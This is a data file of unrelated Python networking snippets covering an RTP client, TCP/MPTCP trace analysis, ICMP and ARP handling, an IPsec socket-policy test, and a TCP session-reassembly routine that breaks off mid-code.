time_sleep = self.play_delay\n time.sleep(time_sleep)\n cache_name = self.write_frame(one_frame_data)\n self.update_movie(cache_name)\n\n # reset parameter\n one_frame_data = \"\"\n fault_mark = 'ack'\n last_time_fault = False\n\n elif marker == 1 and last_time_fault: # end, with error\n self.nak_num += 1\n self.rtcp_socket.sendto(fault_mark.encode(), ('127.0.0.1', self.rtcp_port))\n one_frame_data = \"\"\n fault_mark = 'ack'\n last_time_fault = False\n self.frame_num = 0\n else:\n self.frame_num = currFrameNbr\n if one_frame_data == \"\":\n one_frame_data = rtpPacket.getPayload()\n else:\n one_frame_data += rtpPacket.getPayload()\n except:\n # 超时处理\n if self.play_event.isSet():\n break\n if self.teardown_ack == 1:\n self.rtp_socket.shutdown(socket.SHUT_RDWR)\n self.rtp_socket.close()\n break\n\n if (not self.play_event.isSet()) and self.teardown_ack == 0:\n self.nak_num += 1\n # 之前没有出现错误,仅仅是最后的超时错误\n if not last_time_fault:\n fault_mark = 'nak ' + str(currFrameNbr + 1)\n # 之前出现错误, 帧归0\n if last_time_fault:\n self.frame_num = 0\n self.rtcp_socket.sendto(fault_mark.encode(), ('127.0.0.1', self.rtcp_port))\n last_time_fault = False\n fault_mark = 'ack'", "def test_udp_bad_server():\n assert dnsck_query(\"8.8.8.88\", \"google.com\", \"A\", 1) == 1", "def 
process_mptcp_syn_ack(ts_delta, acks, conn_acks, mptcp_connections, tcp, ip, saddr, daddr, sport, dport, black_list, fast_conns, ts_syn_timeout, ts_timeout):\n # The sender of the SYN/ACK is the server\n if (daddr, dport, saddr, sport) in acks and ((ts_delta - acks[daddr, dport, saddr, sport][co.TIMESTAMP][CLIENT]).total_seconds() < ts_timeout\n and acks[daddr, dport, saddr, sport][co.C2S] == -1):\n # Better to check, if not seen, maybe uncomplete TCP connection\n acks[daddr, dport, saddr, sport][co.C2S] = tcp.ack\n acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER] = ts_delta\n conn_acks[acks[daddr, dport, saddr, sport][co.CONN_ID]][co.TIMESTAMP][SERVER] = ts_delta\n\n elif (daddr, dport, saddr, sport) in acks and ((ts_delta - acks[daddr, dport, saddr, sport][co.TIMESTAMP][CLIENT]).total_seconds() < ts_timeout\n and tcp.ack == acks[daddr, dport, saddr, sport][co.C2S]):\n # SYN/ACK retransmission! But don't do anything special\n acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER] = ts_delta\n conn_acks[acks[daddr, dport, saddr, sport][co.CONN_ID]][co.TIMESTAMP][SERVER] = ts_delta", "def process_pkt_from_server(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, fin_flag):\n if acks[daddr, dport, saddr, sport][co.C2S] >= 0:\n conn_id = acks[daddr, dport, saddr, sport][co.CONN_ID]\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_ACK_TCP] = ts_delta\n if fin_flag:\n connections[conn_id].flow.attr[co.C2S][co.TIME_FIN_ACK_TCP] = ts_delta\n\n bytes_acked = (tcp.ack - acks[daddr, dport, saddr, sport][co.C2S]) % 4294967296\n if bytes_acked >= 2000000000:\n # Ack of 2GB or more is just not possible here\n return\n\n increment_value_dict(nb_acks[co.C2S][conn_id], bytes_acked)\n size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n if size_payload > 0 and tcp.seq in acks[daddr, dport, saddr, sport][SEQ_S2C]:\n # This is a retransmission!\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.S2C][co.TIMESTAMP_RETRANS].append((ts_delta,\n ts_delta - acks[daddr, dport, saddr, sport][HSEQ_S2C][tcp.seq][0],\n ts_delta - acks[daddr, dport, saddr, sport][HSEQ_S2C][tcp.seq][1],\n ts_delta - acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER]))\n acks[daddr, dport, saddr, sport][HSEQ_S2C][tcp.seq][1] = ts_delta\n elif size_payload > 0:\n acks[daddr, dport, saddr, sport][SEQ_S2C].add(tcp.seq)\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_PAYLD_TCP] = ts_delta\n acks[daddr, dport, saddr, sport][HSEQ_S2C][tcp.seq] = [ts_delta, ts_delta]\n # Don't think will face this issue\n# if len(acks[daddr, dport, saddr, sport][SEQ][co.S2C]) >= 3000000:\n# for x in range(50000):\n# acks[daddr, dport, saddr, sport][SEQ][co.S2C].popleft()\n\n acks[daddr, dport, saddr, sport][co.C2S] = tcp.ack\n acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER] = ts_delta", "def translate_control_packet(self, multicast_packet):", "def handle_icmp(pkt, packets, i, start_point):\r\n icmp_type = int(pkt[start_point:start_point+2], 16)\r\n start_point = start_point + 2\r\n icmp_code = int(pkt[start_point:start_point+2], 16)\r\n start_point = start_point + 2\r\n icmp_checksum = pkt[start_point:start_point+4]\r\n packets[i][2].append(icmp_type)\r\n packets[i][2].append(icmp_code)\r\n packets[i][2].append(icmp_checksum)\r\n return packets", "def send_events(sock):\n i=0\n while i<10:\n log.info('Sending message from publisher..')\n 
sock.send(\"even - hai i am publisher\")\n time.sleep(0.2)\n i += 1", "def create_icmp_send_socket():\n sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)\n return sock", "def ping():\n return ping_response()", "def ping():\n return ping_response()", "def ping():\n return ping_response()", "def ping():\n return ping_response()", "def test_keep_alive_sent(self):\n # Receive keep-alive message\n msg = self.sock.recv(4096)\n self.assertTrue(msg.startswith(b\"\\x55\\xaa\"))\n # Send some arbitrary response\n self.sock.send(bytes.fromhex(\"55 aa 01 02 02 00 00 01 04\"))\n # Receive another keep-alive message\n msg = self.sock.recv(4096)\n self.assertTrue(msg.startswith(b\"\\x55\\xaa\"))\n # Send some arbitrary response\n self.sock.send(bytes.fromhex(\"55 aa 01 02 02 00 00 01 04\"))", "def test_notice_on_double_request(arp):\n\n e = Ether(src='00:11:22:aa:bb:ca', dst='ff:ff:ff:ff:ff:ff')\n a = ARP(hwsrc='00:11:22:aa:bb:ca', hwdst='00:00:00:00:00:00', psrc='10.0.0.2', pdst='10.0.0.1', op='who-has')\n\n response = arp.receive_packet(e / a)\n assert type(response) is PermittedResponse\n\n response = arp.receive_packet(e / a)\n assert type(response) is NoticeRespone", "def forward(p):\n try:\n if IP in p and p[IP].dst == RD_ADRRESS and p[Ether].src != GW_MAC_ADRRESS and p[Ether].dst == GW_MAC_ADRRESS:\n if p[IP].src not in black_list:\n send(p[1::], iface=IFACE, verbose=0)\n except:\n print(\"error in forward\")\n finally:\n sys.exit()", "def icmp_probe(self, ip):\n\n\t\tcmd = 'ping %s -n 10' % ip\n\t\tp = Popen(cmd, shell=True, stdin=PIPE, stderr=PIPE, stdout=PIPE)\n\t\tres = p.stdout.read()\n\n\t\tres = res.decode()\n\t\tif len(p.stderr.read()) == 0:\n\t\t\tif 'Destination host unreachable' in res:\n\t\t\t\treturn False\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False", "def ParamTestSocketPolicySimple(self, params):\n\n def AssertEncrypted(packet):\n # This gives a free pass to ICMP and ICMPv6 packets, which show up\n # nondeterministically in tests.\n self.assertEquals(None,\n packet.getlayer(scapy.UDP),\n \"UDP packet sent in the clear\")\n self.assertEquals(None,\n packet.getlayer(scapy.TCP),\n \"TCP packet sent in the clear\")\n\n # We create a pair of sockets, \"left\" and \"right\", that will talk to each\n # other using transport mode ESP. 
Because of TapTwister, both sockets\n # perceive each other as owning \"remote_addr\".\n netid = self.RandomNetid()\n family = net_test.GetAddressFamily(params[\"version\"])\n local_addr = self.MyAddress(params[\"version\"], netid)\n remote_addr = self.GetRemoteSocketAddress(params[\"version\"])\n crypt_left = (xfrm.XfrmAlgo((\n params[\"crypt\"].name,\n params[\"crypt\"].key_len)),\n os.urandom(params[\"crypt\"].key_len / 8)) if params[\"crypt\"] else None\n crypt_right = (xfrm.XfrmAlgo((\n params[\"crypt\"].name,\n params[\"crypt\"].key_len)),\n os.urandom(params[\"crypt\"].key_len / 8)) if params[\"crypt\"] else None\n auth_left = (xfrm.XfrmAlgoAuth((\n params[\"auth\"].name,\n params[\"auth\"].key_len,\n params[\"auth\"].trunc_len)),\n os.urandom(params[\"auth\"].key_len / 8)) if params[\"auth\"] else None\n auth_right = (xfrm.XfrmAlgoAuth((\n params[\"auth\"].name,\n params[\"auth\"].key_len,\n params[\"auth\"].trunc_len)),\n os.urandom(params[\"auth\"].key_len / 8)) if params[\"auth\"] else None\n aead_left = (xfrm.XfrmAlgoAead((\n params[\"aead\"].name,\n params[\"aead\"].key_len,\n params[\"aead\"].icv_len)),\n os.urandom(params[\"aead\"].key_len / 8)) if params[\"aead\"] else None\n aead_right = (xfrm.XfrmAlgoAead((\n params[\"aead\"].name,\n params[\"aead\"].key_len,\n params[\"aead\"].icv_len)),\n os.urandom(params[\"aead\"].key_len / 8)) if params[\"aead\"] else None\n spi_left = 0xbeefface\n spi_right = 0xcafed00d\n req_ids = [100, 200, 300, 400] # Used to match templates and SAs.\n\n # Left outbound SA\n self.xfrm.AddSaInfo(\n src=local_addr,\n dst=remote_addr,\n spi=spi_right,\n mode=xfrm.XFRM_MODE_TRANSPORT,\n reqid=req_ids[0],\n encryption=crypt_right,\n auth_trunc=auth_right,\n aead=aead_right,\n encap=None,\n mark=None,\n output_mark=None)\n # Right inbound SA\n self.xfrm.AddSaInfo(\n src=remote_addr,\n dst=local_addr,\n spi=spi_right,\n mode=xfrm.XFRM_MODE_TRANSPORT,\n reqid=req_ids[1],\n encryption=crypt_right,\n auth_trunc=auth_right,\n aead=aead_right,\n encap=None,\n mark=None,\n output_mark=None)\n # Right outbound SA\n self.xfrm.AddSaInfo(\n src=local_addr,\n dst=remote_addr,\n spi=spi_left,\n mode=xfrm.XFRM_MODE_TRANSPORT,\n reqid=req_ids[2],\n encryption=crypt_left,\n auth_trunc=auth_left,\n aead=aead_left,\n encap=None,\n mark=None,\n output_mark=None)\n # Left inbound SA\n self.xfrm.AddSaInfo(\n src=remote_addr,\n dst=local_addr,\n spi=spi_left,\n mode=xfrm.XFRM_MODE_TRANSPORT,\n reqid=req_ids[3],\n encryption=crypt_left,\n auth_trunc=auth_left,\n aead=aead_left,\n encap=None,\n mark=None,\n output_mark=None)\n\n # Make two sockets.\n sock_left = socket(family, params[\"proto\"], 0)\n sock_left.settimeout(2.0)\n sock_left.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n self.SelectInterface(sock_left, netid, \"mark\")\n sock_right = socket(family, params[\"proto\"], 0)\n sock_right.settimeout(2.0)\n sock_right.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n self.SelectInterface(sock_right, netid, \"mark\")\n\n # For UDP, set SO_LINGER to 0, to prevent TCP sockets from hanging around\n # in a TIME_WAIT state.\n if params[\"proto\"] == SOCK_STREAM:\n net_test.DisableFinWait(sock_left)\n net_test.DisableFinWait(sock_right)\n\n # Apply the left outbound socket policy.\n xfrm_base.ApplySocketPolicy(sock_left, family, xfrm.XFRM_POLICY_OUT,\n spi_right, req_ids[0], None)\n # Apply right inbound socket policy.\n xfrm_base.ApplySocketPolicy(sock_right, family, xfrm.XFRM_POLICY_IN,\n spi_right, req_ids[1], None)\n # Apply right outbound socket policy.\n 
xfrm_base.ApplySocketPolicy(sock_right, family, xfrm.XFRM_POLICY_OUT,\n spi_left, req_ids[2], None)\n # Apply left inbound socket policy.\n xfrm_base.ApplySocketPolicy(sock_left, family, xfrm.XFRM_POLICY_IN,\n spi_left, req_ids[3], None)\n\n server_ready = threading.Event()\n server_error = None # Save exceptions thrown by the server.\n\n def TcpServer(sock, client_port):\n try:\n sock.listen(1)\n server_ready.set()\n accepted, peer = sock.accept()\n self.assertEquals(remote_addr, peer[0])\n self.assertEquals(client_port, peer[1])\n data = accepted.recv(2048)\n self.assertEquals(\"hello request\", data)\n accepted.send(\"hello response\")\n except Exception as e:\n server_error = e\n finally:\n sock.close()\n\n def UdpServer(sock, client_port):\n try:\n server_ready.set()\n data, peer = sock.recvfrom(2048)\n self.assertEquals(remote_addr, peer[0])\n self.assertEquals(client_port, peer[1])\n self.assertEquals(\"hello request\", data)\n sock.sendto(\"hello response\", peer)\n except Exception as e:\n server_error = e\n finally:\n sock.close()\n\n # Server and client need to know each other's port numbers in advance.\n wildcard_addr = net_test.GetWildcardAddress(params[\"version\"])\n sock_left.bind((wildcard_addr, 0))\n sock_right.bind((wildcard_addr, 0))\n left_port = sock_left.getsockname()[1]\n right_port = sock_right.getsockname()[1]\n\n # Start the appropriate server type on sock_right.\n target = TcpServer if params[\"proto\"] == SOCK_STREAM else UdpServer\n server = threading.Thread(\n target=target,\n args=(sock_right, left_port),\n name=\"SocketServer\")\n server.start()\n # Wait for server to be ready before attempting to connect. TCP retries\n # hide this problem, but UDP will fail outright if the server socket has\n # not bound when we send.\n self.assertTrue(server_ready.wait(2.0), \"Timed out waiting for server thread\")\n\n with TapTwister(fd=self.tuns[netid].fileno(), validator=AssertEncrypted):\n sock_left.connect((remote_addr, right_port))\n sock_left.send(\"hello request\")\n data = sock_left.recv(2048)\n self.assertEquals(\"hello response\", data)\n sock_left.close()\n server.join()\n if server_error:\n raise server_error", "def _process(self, buf, ts=None, pkt_num=None):\n\n if not buf:\n return\n self.pkt_num = pkt_num\n eth = dpkt.ethernet.Ethernet(buf)\n ip = eth.data\n tcp = ip.data\n sip = inet_to_str(ip.src)\n dip = inet_to_str(ip.dst)\n fin_flag = tcp.flags & 0x001\n ack_flag = tcp.flags & 0x010\n syn_flag = tcp.flags & 0x002\n rst_flag = tcp.flags & 0x004\n syn_unacceptable_states = [TCPState.ESTABLISHED, TCPState.FIN_WAIT_1, TCPState.FIN_WAIT_2,\n TCPState.CLOSING, TCPState.LAST_ACK]\n data_acceptable_states = [TCPState.ESTABLISHED, TCPState.CLOSE_WAIT]\n tcp_opts = dpkt.tcp.parse_opts(tcp.opts) if tcp.opts else None\n tcp_opts = tcp_opts_tuple_list_to_dict(tcp_opts) if tcp_opts else None\n num_pkt_session_pkt = len(self.sessions[self.session_count]) if self.session_count else 0\n\n # Only Window size can change in ACKs (in other words - after SYNs), nothing else like - window-scaling, or\n # MSS, or Selective-SYN can't be changed. 
If present in options after SYN, should be ignored in my opinion\n # https://superuser.com/questions/966212/does-the-sequence-number-of-tcp-packet-headers-wrap-around\n # TODO: seq number in coming packet is ahead of the expected one, then it should be held for processing\n\n def slide_window():\n\n if len(self.sessions[self.session_count]):\n if sip == self.sip:\n if self._s_mss != -1 and get_tcp_packet_payload_len_with_options(eth) > self._s_mss:\n return\n prev_ip = dpkt.ethernet.Ethernet(self.get_last_c_pkt()).data\n rcv_nxt = self._s_rcv_next\n win_left_end = self._s_win_left_edge\n early_pkts = self._s_early_pkts\n other_end_win_size = self._s_win_size\n current_state = self._c_state\n else:\n if self._c_mss != -1 and get_tcp_packet_payload_len_with_options(ip) > self._c_mss:\n return\n prev_ip = dpkt.ethernet.Ethernet(self.get_last_s_pkt()).data\n rcv_nxt = self._c_rcv_next\n win_left_end = self._c_win_left_edge\n early_pkts = self._c_early_pkts\n other_end_win_size = self._c_win_size\n current_state = self._s_state\n if self._print_debug_info:\n logger.debug(self.client_server_next_rcv(), tcp_pkt_debug_info(ip))\n prev_tcp = prev_ip.data\n prev_tcp_data_offset = prev_tcp.off * 4\n prev_ip_header_len = prev_ip.hl * 4\n prev_tcp_payload_len = prev_ip.len - (prev_tcp_data_offset + prev_ip_header_len)\n tcp_payload_len = get_tcp_packet_payload_len(ip)\n if (tcp_seq_number_in_window(win_left_end, tcp.seq, other_end_win_size) or\n tcp_seq_number_in_window(win_left_end,\n inc_tcp_seq_number(tcp.seq, tcp_payload_len), other_end_win_size)):\n if inc_tcp_seq_number(tcp.seq, tcp_payload_len) == rcv_nxt:\n \"\"\"\n \n Since there is no new payload sent, just store the tcp packet with empty payload.\n This is going to increase the packet count but not going to add duplicated data\n in session data, by session data here it means actual data sent (after discarding\n the retransmission) to application layer. To do that - we will empty out the payload,\n if packets has some, then add the packet to the session, else add the empty packet as it is\n to the session. This logic will easily handle the TCP connections supporting\n TCP Timestamp options describe in https://tools.ietf.org/html/rfc1323\n \n \"\"\"\n # one case is when seq number is < rcv_nxt but sender want to ack more data\n # which means it is sending the same data again but its acking more received content\n \"\"\"\n 1. packet has Data\n a. prev_packet has data\n A. header change (change cur packet and change previous packet) add to list\n B. no header change retransmission ( sum check)\n b. prev_packete has no data\n A. header change (change cur packet only) add to list\n B. no header change retransmission (change cur packet only)\n 2. packet has no data\n a. prev_packet has data\n A. header change (change previous packet only) add to list\n B. no header change (change previous packet only)\n b. prev_packet has no data\n A. header change (sum check) add to list\n B. 
no header change retransmission (sum check)\n \"\"\"\n if prev_tcp.sum == tcp.sum:\n cur_sum = tcp_shasum_calc(ip.src, ip.dst, ip.p, ip.data.pack())\n prev_sum = tcp_shasum_calc(prev_ip.src, prev_ip.dst, prev_ip.p, prev_ip.data.pack())\n if cur_sum == prev_sum:\n # covers 1.a.B and 2.b.B\n return\n\n empty_prev_ip = copy.deepcopy(prev_ip)\n empty_prev_tcp = empty_prev_ip.data\n empty_prev_tcp.seq = rcv_nxt\n empty_prev_ip.len -= prev_tcp_payload_len\n empty_prev_tcp.data = b\"\"\n empty_prev_ip = tcp_fix_checksum(empty_prev_ip)\n new_part_ip = copy.deepcopy(ip)\n new_part_tcp = new_part_ip.data\n new_part_tcp.data = b\"\"\n new_part_tcp.seq = rcv_nxt\n new_part_ip.len -= tcp_payload_len\n new_part_ip.sum = 0\n new_part_tcp.sum = 0\n new_part_ip = tcp_fix_checksum(new_part_ip)\n eth.data = new_part_ip\n cur_pkt = eth.pack()\n new_pkt = dpkt.ethernet.Ethernet(cur_pkt)\n new_part_ip = new_pkt.data\n new_part_tcp = new_part_ip.data\n\n \"\"\"\n Checksum comparision logic is kept to discard the straight duplicates packets\n without Timestamp Options. These kind of packet will not serve any purposes.\n If removal of these checksum comparison code blocks felt necessary, it could\n be removed -- that will add few extra retransmitted packets -- but that would\n also requrie to update the testcases built around this code blocks.\n \"\"\"\n if new_part_tcp.sum == empty_prev_tcp.sum:\n # covers 1.b.B\n # covers case 2.a.B\n if tcp_shasum_calc(ip.src, ip.dst, ip.p, ip.data.pack()) == tcp_shasum_calc(\n prev_ip.src, prev_ip.dst, prev_ip.p, empty_prev_ip.data.pack()):\n return\n \"\"\"\n needs to added to list under cases 2.a.A, 2.b.A, 1.a.A and 1.b.A\n cur_pkt is updated earlier\n \"\"\"\n if sip == self.sip:\n if inc_tcp_seq_number(self._c_rcv_next, 1) <= new_part_tcp.ack:\n self._c_rcv_next = new_part_tcp.ack\n else:\n if inc_tcp_seq_number(self._s_rcv_next, 1) <= new_part_tcp.ack:\n self._s_rcv_next = new_part_tcp.ack\n elif (current_state in data_acceptable_states and\n tcp_seq_number_in_window(tcp.seq, rcv_nxt, tcp_payload_len)):\n stale_data_len = seq_numbers_diff(tcp.seq, rcv_nxt)\n win_right_end = inc_tcp_seq_number(win_left_end, other_end_win_size)\n if tcp_seq_number_in_window(rcv_nxt, inc_tcp_seq_number(tcp.seq, tcp_payload_len),\n seq_numbers_diff(rcv_nxt, win_right_end)):\n tcp.data = tcp.data[stale_data_len:]\n else:\n allowed_payload_size = seq_numbers_diff(rcv_nxt, win_right_end)\n remaining_eth = dpkt.ethernet.Ethernet(eth.pack())\n #remaining_ip = eth.data\n #remaining_tcp = remaining_ip.data\n remaining_eth.data.data.seq = inc_tcp_seq_number(tcp.seq, stale_data_len + allowed_payload_size)\n remaining_eth.data.data.data = tcp.data[stale_data_len + allowed_payload_size:]\n remaining_eth.data.len -= stale_data_len + allowed_payload_size\n remaining_eth.data = tcp_fix_checksum(remaining_eth.data)\n #remaining_eth.data = remaining_ip\n tcp.data = tcp.data[stale_data_len: stale_data_len + allowed_payload_size]\n if self.sip == sip:\n self._s_early_pkts.append(((ts, self.pkt_num), remaining_eth.pack()))\n else:\n self._c_early_pkts.append(((ts, self.pkt_num), remaining_eth.pack()))\n tcp.sum = 0\n # ip.len -= stale_data_len\n tcp.seq = rcv_nxt\n ip.data = tcp\n ip.sum = 0\n eth.data = ip\n cur_pkt = eth.pack()\n if sip == self.sip:\n self._s_rcv_next = inc_tcp_seq_number(self._s_rcv_next,\n (ip.len - (ip.hl * 4 + tcp.off * 4)))\n else:\n self._c_rcv_next = inc_tcp_seq_number(self._c_rcv_next,\n (ip.len - (ip.hl * 4 + tcp.off * 4)))\n elif (current_state in data_acceptable_states and\n 
tcp_seq_number_in_window(rcv_nxt, tcp.seq, other_end_win_size)):\n # hold it for further processing\n if self.sip == sip:\n self._s_early_pkts.append(((ts, self.pkt_num), buf))\n else:\n self._c_early_pkts.append(((ts, self.pkt_num), buf))\n return\n else:\n return\n self.sessions[self.session_count].append(((ts, self.pkt_num), cur_pkt))\n # as this packet is accepted, might need to update the rwnd size and left end of rwnd\n if sip == self.sip:\n self._c_payload_size += len(eth.data.data.data)\n logger.debug(\"Client send data size: {}. Accepted data size is: {}.\"\n \" Total data sent from client is: {}\".format(\n len(tcp.data), len(eth.data.data.data), self._c_payload_size))\n self._c_prev_pkt_ind = len(self.sessions[self.session_count]) - 1\n rcv_nxt = self._s_rcv_next\n if (not tcp.ack == self._c_win_left_edge and\n tcp_seq_number_in_window(inc_tcp_seq_number(self._c_win_left_edge, 1),\n tcp.ack, self._c_win_size)):\n self._c_win_left_edge = tcp.ack\n self._c_win_size = tcp.win << self._c_win_scaling_factor\n else:\n self._s_payload_size += len(eth.data.data.data)\n logger.debug(\"Server send data of size: {}. Accepted data size is: {}.\"\n \" Total data sent from server is: {}\".format(\n len(tcp.data), len(eth.data.data.data), self._s_payload_size))\n self._s_prev_pkt_ind = len(self.sessions[self.session_count]) - 1\n rcv_nxt = self._c_rcv_next\n # left edge is incremented by one becuase in_window function checks for inclusive seq number\n # starting at left edge but ACK tells what's the next expected seq number, which could be 1 next\n # to the end of window\n if (not tcp.ack == self._s_win_left_edge and\n tcp_seq_number_in_window(inc_tcp_seq_number(self._s_win_left_edge, 1),\n tcp.ack, self._s_win_size)):\n self._s_win_left_edge = tcp.ack\n self._s_win_size = tcp.win << self._s_win_scaling_factor\n # check if packet at the head of queue is ready to be processed\n while True:\n if len(early_pkts) == 0:\n break\n (_ts, _pkt_num), _buf = early_pkts.popleft()\n early_eth = dpkt.ethernet.Ethernet(_buf)\n early_ip = early_eth.data\n early_tcp = early_ip.data\n if tcp_seq_number_in_window(early_tcp.seq, rcv_nxt, get_tcp_packet_payload_len(early_ip)):\n # if early_tcp.seq <= rcv_nxt:\n self._process(early_eth.pack(), _ts, _pkt_num)\n else:\n early_pkts.appendleft(((_ts, _pkt_num), early_eth.pack()))\n break\n\n \"\"\"\n TCP flags:0x000 (12 bits)\n [11 10 9 8 7 6 5 4 3 2 1 0]\n - Bit 11 10 9: reserved\n - Bit 8: nonce\n - Bit 7: CWR (Congestion window reduced)\n - Bit 6: ECN-Echo (Explicit Congestion Notification)\n - Bit 5: Urgent\n - Bit 4: ACK\n - Bit 3: Push\n - Bit 2: Reset\n - Bit 1: SYN\n - Bit 0: FIN\n \"\"\"\n\n \"\"\"TCP flags for SYN [000000010111]\"\"\"\n\n prev_c_pkt = dpkt.ethernet.Ethernet(self.get_last_c_pkt()) if self.get_last_c_pkt() else None\n prev_c_tcp = prev_c_pkt.data.data if prev_c_pkt else None\n prev_s_pkt = dpkt.ethernet.Ethernet(self.get_last_s_pkt()) if self.get_last_s_pkt() else None\n prev_s_tcp = prev_s_pkt.data.data if prev_s_pkt else None\n logger.debug(tcp_pkt_debug_info(ip))\n logger.debug(tcp_pkt_options_debug_info(tcp))\n logger.debug(\"Processing packet number: {} in the current session\".format(self.pkt_num))\n if rst_flag:\n logger.info(\"Received a RESET flag, packet info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n if self._c_state == TCPState.CLOSED and self._s_state == TCPState.LISTENING:\n self.session_count += 1\n self.sessions[self.session_count] = 
[((ts, self.pkt_num), buf)]\n self._c_state = self._s_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n return\n self._c_state = self._s_state = TCPState.CLOSED\n if self.sip == sip:\n self._c_prev_pkt_ind = len(self.sessions[self.session_count])\n else:\n self._s_prev_pkt_ind = len(self.sessions[self.session_count])\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif syn_flag and (self._c_state in syn_unacceptable_states or self._s_state in syn_unacceptable_states):\n logger.info(\"Received a unacceptable SYN flag, packet info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n self._s_state = self._c_state = TCPState.CLOSED\n self.sessions[self.session_count].append(((ts,self.pkt_num), buf))\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif (self._c_state == TCPState.CLOSED and self._s_state == TCPState.LISTENING and\n self.sip == sip):\n if tcp.flags & 0x017 == 0x002:\n self.session_count += 1\n logger.info(\"number of sessions so far: {}\".format(self.session_count - 1))\n logger.info(\"starting a new session, pkt info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n self.sessions[self.session_count] = []\n self._c_prev_pkt_ind = len(self.sessions[self.session_count])\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n self._c_state = TCPState.SYN_SENT\n self._s_state = TCPState.SYN_RECEIVED\n self._c_seq = tcp.seq\n if tcp_opts:\n if dpkt.tcp.TCP_OPT_WSCALE in tcp_opts:\n self._c_win_scaling_factor = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_WSCALE], \"big\")\n if dpkt.tcp.TCP_OPT_MSS in tcp_opts:\n self._c_mss = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_MSS], \"big\")\n else:\n self._c_win_scaling_factor = 0\n self._c_mss = -1\n self._c_win_size = tcp.win << self._c_win_scaling_factor\n logger.info(\"SYN flag from: {}:{}. 
Full TCP Flag is: {}\".format(self.sip, self.sp, hex(tcp.flags)))\n logger.info(\"TCP options in the packet: {}\".format(tcp_pkt_options_debug_info(tcp)))\n\n elif self._c_state == TCPState.SYN_SENT and self._s_state == TCPState.SYN_RECEIVED:\n logger.info(\"TCP packet info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n if self.sip == dip:\n exp_ack = inc_tcp_seq_number(prev_c_tcp.seq, 1)\n if not (tcp.flags & 0x017 == 0x012):\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n self._s_state = self._c_state = TCPState.CLOSED\n logger.info(\"SYN-ACK flag is not set in the TCP flags: {} from: {}:{}\".format(hex(tcp.flags),\n self.dip, self.dp))\n return\n if tcp.ack == exp_ack:\n self._s_prev_pkt_ind = len(self.sessions[self.session_count])\n self._s_rcv_next = exp_ack\n self._s_win_left_edge = exp_ack\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n if tcp_opts:\n if dpkt.tcp.TCP_OPT_WSCALE in tcp_opts:\n self._s_win_scaling_factor = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_WSCALE], \"big\")\n if dpkt.tcp.TCP_OPT_MSS in tcp_opts:\n self._s_mss = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_MSS], \"big\")\n else:\n self._s_win_scaling_factor = 0\n self._s_mss = -1\n self._s_win_size = tcp.win << self._s_win_scaling_factor\n logger.info(\"SYN-ACK flag from: {}:{}. Full TCP flag is: {}\".format(\n self.dip, self.dp, hex(tcp.flags)))\n logger.info(\"TCP options in the packet: {}\".format(tcp_pkt_options_debug_info(tcp)))\n elif prev_s_tcp:\n exp_ack = inc_tcp_seq_number(prev_s_tcp.seq, 1)\n if tcp.flags & 0x017 == 0x010:\n if tcp.ack == exp_ack and tcp.seq == prev_s_tcp.ack:\n self._s_state = self._c_state = TCPState.ESTABLISHED\n self._c_seq = tcp.seq\n self._c_prev_pkt_ind = len(self.sessions[self.session_count])\n self._c_rcv_next = exp_ack\n self._c_win_left_edge = exp_ack\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n self._c_win_size = tcp.win << self._c_win_scaling_factor\n logger.info(\"TCP handshake complete.\")\n else:\n self._s_state = self._c_state = TCPState.CLOSED\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n logger.info(\"TCP handshake was not completed.\")\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.ESTABLISHED and self._s_state == TCPState.ESTABLISHED:\n if ack_flag:\n \"\"\" if ACK flag is off drop the segment as per:\n https://tools.ietf.org/html/rfc793#page-37\n \"\"\"\n logger.debug(tcp_pkt_debug_info(ip))\n logger.debug(tcp_pkt_options_debug_info(tcp))\n num_pkt_session_pkt = len(self.sessions[self.session_count])\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and fin_flag:\n logger.info(\"Received a FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n if self.sip == sip:\n self._c_state = TCPState.FIN_WAIT_1\n else:\n self._s_state = TCPState.FIN_WAIT_1\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.FIN_WAIT_1 and self._s_state == TCPState.ESTABLISHED:\n if ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and sip == 